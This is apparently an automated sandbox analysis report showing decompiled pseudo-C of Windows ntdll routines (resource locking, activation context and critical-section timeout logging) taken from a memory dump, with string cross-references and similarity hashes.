                                                                                                                          0x00000000
                                                                                                                          0x036e0623
                                                                                                                          0x036e0556
                                                                                                                          0x036e0557
                                                                                                                          0x036e056f
                                                                                                                          0x036e0574
                                                                                                                          0x036e0583
                                                                                                                          0x036e058a
                                                                                                                          0x036e058b
                                                                                                                          0x036e058d
                                                                                                                          0x036e05b5
                                                                                                                          0x036e05c0
                                                                                                                          0x036e05c6
                                                                                                                          0x036e05c8
                                                                                                                          0x036e05cb
                                                                                                                          0x036e05cd
                                                                                                                          0x036e05d3
                                                                                                                          0x036e05d5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e05db
                                                                                                                          0x036e05db
                                                                                                                          0x036e05e3
                                                                                                                          0x036e05e7
                                                                                                                          0x036e05e9
                                                                                                                          0x036e05eb
                                                                                                                          0x036e05ed
                                                                                                                          0x036e05ed
                                                                                                                          0x036e05fa
                                                                                                                          0x036e05ff
                                                                                                                          0x036e0606
                                                                                                                          0x036e060b
                                                                                                                          0x036e060d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e0613
                                                                                                                          0x036e0613
                                                                                                                          0x036e0616
                                                                                                                          0x036e0616
                                                                                                                          0x00000000
                                                                                                                          0x036e061e
                                                                                                                          0x036e058f
                                                                                                                          0x036e0594
                                                                                                                          0x036e0596
                                                                                                                          0x036e0598
                                                                                                                          0x00000000
                                                                                                                          0x036e059d
                                                                                                                          0x03684196
                                                                                                                          0x03684198
                                                                                                                          0x0368419d
                                                                                                                          0x0368419f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036841a1
                                                                                                                          0x00000000
                                                                                                                          0x03684151
                                                                                                                          0x03684151
                                                                                                                          0x03684151
                                                                                                                          0x00000000
                                                                                                                          0x03684151

                                                                                                                          Strings
                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036E05AC
                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 036E05F1
                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036E0566
                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 036E058F
                                                                                                                          • ExecuteOptions, xrefs: 036E050A
                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036E04BF
                                                                                                                          • Execute=1, xrefs: 036E057D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                          • API String ID: 0-484625025
                                                                                                                          • Opcode ID: 4462939f89a3e3a2f1177dfa4708d55a9210bc2ed9b5ecb600b0ef16f8c11d39
                                                                                                                          • Instruction ID: b54cd574509b30b885a37ef015d231c8dc0d85f74a92e0d32671641e94468f8f
                                                                                                                          • Opcode Fuzzy Hash: 4462939f89a3e3a2f1177dfa4708d55a9210bc2ed9b5ecb600b0ef16f8c11d39
                                                                                                                          • Instruction Fuzzy Hash: EE616C35A0030ABADF11FB97DD85FBA7BBCEF18300F040199D5459B280DF709A558B64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 036877A0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 99COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E036877A0(void* __ecx, void* __edx, intOrPtr _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t16;
				char _t17;
				char _t21;
				void* _t23;
				char _t28;
				intOrPtr* _t30;
				char _t32;
				intOrPtr _t34;
				void* _t37;
				intOrPtr _t39;
				char _t42;
				signed int _t49;
				signed int _t50;
				void* _t51;

				_t37 = __edx;
				_t50 = _t49 & 0xfffffff8;
				_push(__ecx);
				_t39 = _a4;
				_t30 = _t39 + 0x28;
				_t42 =  *_t30;
				if(_t42 < 0) {
					_t34 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t39 + 0x2c)) -  *((intOrPtr*)(_t34 + 0x24));
					if( *((intOrPtr*)(_t39 + 0x2c)) !=  *((intOrPtr*)(_t34 + 0x24))) {
						while(1) {
							L7:
							__eflags = _t42;
							if(_t42 >= 0) {
								goto L1;
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L19:
								_t17 = 0;
								L3:
								return _t17;
							}
							_t18 =  *((intOrPtr*)(_t39 + 0x34));
							_t36 = _t39 + 0x1c;
							 *((intOrPtr*)(_t18 + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t39 + 0x34)) + 0x14)) + 1;
							asm("lock inc dword [ecx]");
							_t42 =  *_t30;
							__eflags = _t42;
							if(_t42 < 0) {
								L11:
								_t32 = 0;
								__eflags = 0;
								while(1) {
									asm("sbb esi, esi");
									_t47 =  !( ~( *(_t39 + 0x30) & 1)) & 0x037779c8;
									_push( !( ~( *(_t39 + 0x30) & 1)) & 0x037779c8);
									_push(0);
									_push( *((intOrPtr*)(_t39 + 0x18)));
									_t21 = E036C9520();
									__eflags = _t21 - 0x102;
									if(_t21 != 0x102) {
										break;
									}
									_t23 = E036CCE00( *_t47,  *((intOrPtr*)(_t47 + 4)), 0xff676980, 0xffffffff);
									_push(_t37);
									_push(_t23);
									E03715720(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t32);
									E03715720(0x65, 0, "RTL: Resource at %p\n", _t39);
									_t51 = _t50 + 0x28;
									_t32 = _t32 + 1;
									__eflags = _t32 - 2;
									if(__eflags > 0) {
										_t36 = _t39;
										E0371FFB9(_t32, _t39, _t37, _t39, 0, __eflags);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E03715720();
									_t50 = _t51 + 0xc;
								}
								_t30 = _t39 + 0x28;
								__eflags = _t21;
								if(_t21 < 0) {
									L036DDF30(_t36, _t37, _t21);
									goto L19;
								}
								_t42 =  *_t30;
								continue;
							}
							_t28 = E036C47E7(_t36);
							__eflags = _t28;
							if(_t28 != 0) {
								continue;
							}
							goto L11;
						}
						goto L1;
					}
					asm("lock dec dword [ebx]");
					L2:
					_t17 = 1;
					goto L3;
				}
				L1:
				_t16 = _t42;
				asm("lock cmpxchg [ebx], ecx");
				if(_t16 != _t42) {
					_t42 = _t16;
					goto L7;
				}
				goto L2;
			}





















                                                                                                                          0x036877a0
                                                                                                                          0x036877a5
                                                                                                                          0x036877a8
                                                                                                                          0x036877ac
                                                                                                                          0x036877af
                                                                                                                          0x036877b2
                                                                                                                          0x036877b6
                                                                                                                          0x036877d4
                                                                                                                          0x036877de
                                                                                                                          0x036877e1
                                                                                                                          0x036e28f2
                                                                                                                          0x036e28f2
                                                                                                                          0x036e28f2
                                                                                                                          0x036e28f4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e28fa
                                                                                                                          0x036e28fe
                                                                                                                          0x036e29ae
                                                                                                                          0x036e29ae
                                                                                                                          0x036877cb
                                                                                                                          0x036877d1
                                                                                                                          0x036877d1
                                                                                                                          0x036e2904
                                                                                                                          0x036e2907
                                                                                                                          0x036e290a
                                                                                                                          0x036e290d
                                                                                                                          0x036e2910
                                                                                                                          0x036e2912
                                                                                                                          0x036e2914
                                                                                                                          0x036e291f
                                                                                                                          0x036e291f
                                                                                                                          0x036e291f
                                                                                                                          0x036e2921
                                                                                                                          0x036e292b
                                                                                                                          0x036e292f
                                                                                                                          0x036e2935
                                                                                                                          0x036e2936
                                                                                                                          0x036e2938
                                                                                                                          0x036e293b
                                                                                                                          0x036e2940
                                                                                                                          0x036e2945
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e2953
                                                                                                                          0x036e2958
                                                                                                                          0x036e2959
                                                                                                                          0x036e2965
                                                                                                                          0x036e2973
                                                                                                                          0x036e2978
                                                                                                                          0x036e297b
                                                                                                                          0x036e297c
                                                                                                                          0x036e297f
                                                                                                                          0x036e2981
                                                                                                                          0x036e2983
                                                                                                                          0x036e2983
                                                                                                                          0x036e2988
                                                                                                                          0x036e298d
                                                                                                                          0x036e298e
                                                                                                                          0x036e2990
                                                                                                                          0x036e2995
                                                                                                                          0x036e2995
                                                                                                                          0x036e299a
                                                                                                                          0x036e299d
                                                                                                                          0x036e299f
                                                                                                                          0x036e29a9
                                                                                                                          0x00000000
                                                                                                                          0x036e29a9
                                                                                                                          0x036e29a1
                                                                                                                          0x00000000
                                                                                                                          0x036e29a1
                                                                                                                          0x036e2916
                                                                                                                          0x036e291b
                                                                                                                          0x036e291d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e291d
                                                                                                                          0x00000000
                                                                                                                          0x036e28f2
                                                                                                                          0x036877e7
                                                                                                                          0x036877c9
                                                                                                                          0x036877c9
                                                                                                                          0x00000000
                                                                                                                          0x036877c9
                                                                                                                          0x036877b8
                                                                                                                          0x036877bb
                                                                                                                          0x036877bd
                                                                                                                          0x036877c3
                                                                                                                          0x036e28f0
                                                                                                                          0x00000000
                                                                                                                          0x036e28f0
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036E2953
                                                                                                                          Strings
                                                                                                                          • RTL: Resource at %p, xrefs: 036E296B
                                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 036E295B
                                                                                                                          • RTL: Re-Waiting, xrefs: 036E2988
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                          • API String ID: 885266447-605551621
                                                                                                                          • Opcode ID: e97deaf35efd7c79223b4d2ba8c41cfac9d6f7542a12fd47356305fa7c2fd1a2
                                                                                                                          • Instruction ID: f397e0d0f8532f5dce5146770ecae1b4c2ab4f285c122fafa4303c9930aaee16
                                                                                                                          • Opcode Fuzzy Hash: e97deaf35efd7c79223b4d2ba8c41cfac9d6f7542a12fd47356305fa7c2fd1a2
                                                                                                                          • Instruction Fuzzy Hash: ED315B36A01725BBDB21EA16CC85F6B7B6EEF46B20F240658EC545B241CB21B819C7E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 036C1CC7, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 193COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 69%
                                                                                                                          			E036C1CC7(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t91;
				intOrPtr _t95;
				short _t96;
				intOrPtr _t104;
				intOrPtr _t111;
				short _t119;
				signed int _t131;
				intOrPtr _t134;
				intOrPtr _t138;
				intOrPtr* _t144;
				intOrPtr* _t147;
				intOrPtr* _t149;
				void* _t151;

				_t139 = __edx;
				_push(0x154);
				_push(0x3760348);
				E036DD0E8(__ebx, __edi, __esi);
				 *(_t151 - 0xf0) = __edx;
				_t147 = __ecx;
				 *((intOrPtr*)(_t151 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t151 - 0xf8)) =  *((intOrPtr*)(_t151 + 8));
				 *((intOrPtr*)(_t151 - 0xe8)) =  *((intOrPtr*)(_t151 + 0xc));
				 *((intOrPtr*)(_t151 - 0xf4)) =  *((intOrPtr*)(_t151 + 0x10));
				 *((intOrPtr*)(_t151 - 0xe4)) = 0;
				 *((intOrPtr*)(_t151 - 0xdc)) = 0;
				 *((intOrPtr*)(_t151 - 0xd8)) = 0;
				 *(_t151 - 0xe0) = 0;
				 *((intOrPtr*)(_t151 - 0x140)) = 0x40;
				E036CFA60(_t151 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t151 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t151 - 0x160)) = 1;
				_t131 = 7;
				memset(_t151 - 0x15c, 0, _t131 << 2);
				_t144 =  *((intOrPtr*)(_t151 - 0xe8));
				_t91 = E036A2430(1, _t147, 0,  *((intOrPtr*)(_t151 - 0xf8)), _t144,  *((intOrPtr*)(_t151 - 0xf4)), _t151 - 0xe0, 0, 0);
				_t148 = _t91;
				if(_t91 >= 0) {
					if( *0x3778460 != 0 && ( *(_t151 - 0xe0) & 0x00000001) == 0) {
						_t95 = E036A2D50(7, 0, 2,  *((intOrPtr*)(_t151 - 0xfc)), _t151 - 0x140);
						_t148 = _t95;
						if(_t95 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t151 - 0x13c)) == 1) {
							if(( *(_t151 - 0x118) & 0x00000001) == 0) {
								if(( *(_t151 - 0x118) & 0x00000002) != 0) {
									 *(_t151 - 0x120) = 0xfffffffc;
								}
							} else {
								 *(_t151 - 0x120) =  *(_t151 - 0x120) & 0x00000000;
							}
							_t134 =  *((intOrPtr*)(_t151 - 0x114));
							_t96 =  *((intOrPtr*)(_t134 + 0x5c));
							 *((short*)(_t151 - 0xda)) = _t96;
							 *((short*)(_t151 - 0xdc)) = _t96;
							 *((intOrPtr*)(_t151 - 0xd8)) =  *((intOrPtr*)(_t134 + 0x60)) +  *((intOrPtr*)(_t151 - 0x110));
							 *((intOrPtr*)(_t151 - 0xe8)) = _t151 - 0xd0;
							 *((short*)(_t151 - 0xea)) = 0xaa;
							_t104 = E03694720(_t139,  *(_t151 - 0xf0) & 0x0000ffff, _t151 - 0xec, 2, 0);
							_t148 = _t104;
							if(_t104 < 0 || E03699660(_t151 - 0xdc, _t151 - 0xec, 1) == 0) {
								goto L1;
							} else {
								_t149 =  *0x3778460; // 0x7478ff90
								 *0x377b1e0( *(_t151 - 0x120),  *(_t151 - 0xf0), _t151 - 0xe4);
								_t148 =  *_t149();
								 *((intOrPtr*)(_t151 - 0xd4)) = _t148;
								if(_t148 < 0) {
									goto L1;
								}
								_t111 =  *((intOrPtr*)(_t151 - 0xe4));
								if(_t111 == 0xffffffff) {
									L25:
									 *((intOrPtr*)(_t151 - 4)) = 1;
									_t144 =  *0x3778468;
									if(_t144 != 0) {
										 *0x377b1e0(_t111);
										 *_t144();
									}
									 *((intOrPtr*)(_t151 - 4)) = 0xfffffffe;
									goto L1;
								}
								E0369F540(_t151 - 0x164, _t111);
								 *((intOrPtr*)(_t151 - 4)) = 0;
								if( *((intOrPtr*)(_t144 + 4)) != 0) {
									L036A2400(_t144);
								}
								_t145 =  *((intOrPtr*)(_t151 - 0xfc));
								_t148 = E036A2430(0,  *((intOrPtr*)(_t151 - 0xfc)), 0,  *((intOrPtr*)(_t151 - 0xf8)), _t144,  *((intOrPtr*)(_t151 - 0xf4)), _t151 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t151 - 0xd4)) = _t148;
								if(_t148 < 0) {
									L24:
									 *((intOrPtr*)(_t151 - 4)) = 0xfffffffe;
									_t111 = E036FD704();
									goto L25;
								} else {
									_t148 = E036A2D50(7, 0, 2, _t145, _t151 - 0x140);
									 *((intOrPtr*)(_t151 - 0xd4)) = _t148;
									if(_t148 < 0) {
										goto L24;
									}
									if( *((intOrPtr*)(_t151 - 0x13c)) == 1) {
										_t138 =  *((intOrPtr*)(_t151 - 0x114));
										_t119 =  *((intOrPtr*)(_t138 + 0x5c));
										 *((short*)(_t151 - 0xda)) = _t119;
										 *((short*)(_t151 - 0xdc)) = _t119;
										 *((intOrPtr*)(_t151 - 0xd8)) =  *((intOrPtr*)(_t138 + 0x60)) +  *((intOrPtr*)(_t151 - 0x110));
										if(E03699660(_t151 - 0xdc, _t151 - 0xec, 1) == 0) {
											goto L24;
										}
										_t148 = 0xc0150004;
										L23:
										 *((intOrPtr*)(_t151 - 0xd4)) = _t148;
										goto L24;
									}
									_t148 = 0xc0150005;
									goto L23;
								}
							}
						}
						_t148 = 0xc0150005;
					}
				}
				L1:
				return E036DD130(1, _t144, _t148);
			}
















                                                                                                                          0x036c1cc7
                                                                                                                          0x036c1cc7
                                                                                                                          0x036c1ccc
                                                                                                                          0x036c1cd1
                                                                                                                          0x036c1cd6
                                                                                                                          0x036c1cdc
                                                                                                                          0x036c1cde
                                                                                                                          0x036c1ce7
                                                                                                                          0x036c1cf0
                                                                                                                          0x036c1cf9
                                                                                                                          0x036c1d01
                                                                                                                          0x036c1d09
                                                                                                                          0x036c1d0f
                                                                                                                          0x036c1d15
                                                                                                                          0x036c1d1b
                                                                                                                          0x036c1d2f
                                                                                                                          0x036c1d37
                                                                                                                          0x036c1d44
                                                                                                                          0x036c1d4c
                                                                                                                          0x036c1d55
                                                                                                                          0x036c1d68
                                                                                                                          0x036c1d78
                                                                                                                          0x036c1d7d
                                                                                                                          0x036c1d81
                                                                                                                          0x036fd4e3
                                                                                                                          0x036fd509
                                                                                                                          0x036fd50e
                                                                                                                          0x036fd512
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036fd51e
                                                                                                                          0x036fd531
                                                                                                                          0x036fd543
                                                                                                                          0x036fd545
                                                                                                                          0x036fd545
                                                                                                                          0x036fd533
                                                                                                                          0x036fd533
                                                                                                                          0x036fd533
                                                                                                                          0x036fd54f
                                                                                                                          0x036fd555
                                                                                                                          0x036fd559
                                                                                                                          0x036fd560
                                                                                                                          0x036fd570
                                                                                                                          0x036fd57c
                                                                                                                          0x036fd587
                                                                                                                          0x036fd5a3
                                                                                                                          0x036fd5a8
                                                                                                                          0x036fd5ac
                                                                                                                          0x00000000
                                                                                                                          0x036fd5ce
                                                                                                                          0x036fd5e1
                                                                                                                          0x036fd5e9
                                                                                                                          0x036fd5f1
                                                                                                                          0x036fd5f3
                                                                                                                          0x036fd5fb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036fd601
                                                                                                                          0x036fd60a
                                                                                                                          0x036fd6e1
                                                                                                                          0x036fd6e1
                                                                                                                          0x036fd6e4
                                                                                                                          0x036fd6ec
                                                                                                                          0x036fd6f1
                                                                                                                          0x036fd6f7
                                                                                                                          0x036fd6f7
                                                                                                                          0x036fd730
                                                                                                                          0x00000000
                                                                                                                          0x036fd730
                                                                                                                          0x036fd618
                                                                                                                          0x036fd61f
                                                                                                                          0x036fd625
                                                                                                                          0x036fd628
                                                                                                                          0x036fd628
                                                                                                                          0x036fd644
                                                                                                                          0x036fd651
                                                                                                                          0x036fd653
                                                                                                                          0x036fd65b
                                                                                                                          0x036fd6d5
                                                                                                                          0x036fd6d5
                                                                                                                          0x036fd6dc
                                                                                                                          0x00000000
                                                                                                                          0x036fd65d
                                                                                                                          0x036fd670
                                                                                                                          0x036fd672
                                                                                                                          0x036fd67a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036fd682
                                                                                                                          0x036fd68b
                                                                                                                          0x036fd691
                                                                                                                          0x036fd695
                                                                                                                          0x036fd69c
                                                                                                                          0x036fd6ac
                                                                                                                          0x036fd6c8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036fd6ca
                                                                                                                          0x036fd6cf
                                                                                                                          0x036fd6cf
                                                                                                                          0x00000000
                                                                                                                          0x036fd6cf
                                                                                                                          0x036fd684
                                                                                                                          0x00000000
                                                                                                                          0x036fd684
                                                                                                                          0x036fd65b
                                                                                                                          0x036fd5ac
                                                                                                                          0x036fd520
                                                                                                                          0x036fd520
                                                                                                                          0x036fd4e3
                                                                                                                          0x036c1d87
                                                                                                                          0x036c1d8e

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $$@
                                                                                                                          • API String ID: 0-1194432280
                                                                                                                          • Opcode ID: d4c6a7b34cce4cbfec84cef939e0403f70eaf064b61ab960434b8cc5882797f6
                                                                                                                          • Instruction ID: 819d24f26ea2d793c5a38c7c550f57b13e87ac0cf88383dbb33522d9a5cc4b88
                                                                                                                          • Opcode Fuzzy Hash: d4c6a7b34cce4cbfec84cef939e0403f70eaf064b61ab960434b8cc5882797f6
                                                                                                                          • Instruction Fuzzy Hash: D2812971D002699BDB21DF54CD45BEEB6B8AF09714F0441EAEA0DBB240D7706E85CFA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0371FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 53%
                                                                                                                          			E0371FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E036CCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03715720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03715720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                          0x0371fdda
                                                                                                                          0x0371fde2
                                                                                                                          0x0371fde5
                                                                                                                          0x0371fdec
                                                                                                                          0x0371fdfa
                                                                                                                          0x0371fdff
                                                                                                                          0x0371fe0a
                                                                                                                          0x0371fe0f
                                                                                                                          0x0371fe17
                                                                                                                          0x0371fe1e
                                                                                                                          0x0371fe19
                                                                                                                          0x0371fe19
                                                                                                                          0x0371fe19
                                                                                                                          0x0371fe20
                                                                                                                          0x0371fe21
                                                                                                                          0x0371fe22
                                                                                                                          0x0371fe25
                                                                                                                          0x0371fe40

                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0371FDFA
                                                                                                                          Strings
                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0371FE2B
                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0371FE01
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                          • API String ID: 885266447-3903918235
                                                                                                                          • Opcode ID: 0c41c88357e8a187a890367e9f219bce57dd3f532a11704c02e336de3d33f998
                                                                                                                          • Instruction ID: 7e7dc022204a04fec3045dff252f091a8efc5e3ecc5f6aa03c60bf9c69ee705d
                                                                                                                          • Opcode Fuzzy Hash: 0c41c88357e8a187a890367e9f219bce57dd3f532a11704c02e336de3d33f998
                                                                                                                          • Instruction Fuzzy Hash: C0F0C277200641BFE7259A49DC06E23BB6AEB85B30F140318F6285A1D1DA62A87096A4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%